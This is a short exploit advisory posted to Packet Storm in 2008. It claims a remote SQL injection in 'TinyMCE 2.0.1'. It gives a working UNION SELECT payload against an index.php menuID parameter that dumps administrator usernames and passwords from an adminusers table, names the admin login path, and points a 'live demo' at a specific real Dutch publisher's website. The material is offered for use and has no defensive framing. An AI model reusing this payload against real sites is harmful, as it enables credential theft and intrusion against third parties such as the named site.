TinyMCE 2.0.1 SQL Injection

2008-12-22T00:00:00
ID PACKETSTORM:73181
Type packetstorm
Reporter AnGeL25dZ
Modified 2008-12-22T00:00:00

Description

                                        
                                            `************************************************************  
** TinyMCE Remote SQL Injection  
************************************************************  
** Prodcut: TinyMCE Version 2.0.1  
** Home : http://tinymce.moxiecode.com  
** Vunlerability : 2/ SQL Injection  
** Risk : high !!  
** Dork : N/A  
************************************************************  
** Discovred by: AnGeL25dZ  
** From : Constantine - Algeria  
** Contact : angel25dz@gmail.com   
** *********************************************************  
** Greetz to : ALLAH  
** All Members of HackTeachTeam http://www.hackteach.org/  
** Ra3ch, His0k4  
************************************************************  
** Remote SQL Injection vulnerability  
**  
** Exploit :index.php?menuID=-1 union select 0,Group_CONCAT(loginnaam,CHAR(32,58,32),wachtwoord),2,3 from adminusers  
**  
** Use : http://[path]/Exploit  
** Admin : http://[path]/cms/login.php  
****************************************************************  
** Live demo : http://www.uitgeverijginkgo.nl/index.php?menuID=-1 union select 0,Group_CONCAT(loginnaam,CHAR(32,58,32),wachtwoord),2,3 from adminusers  
**  
****************************************************************  
  
  
`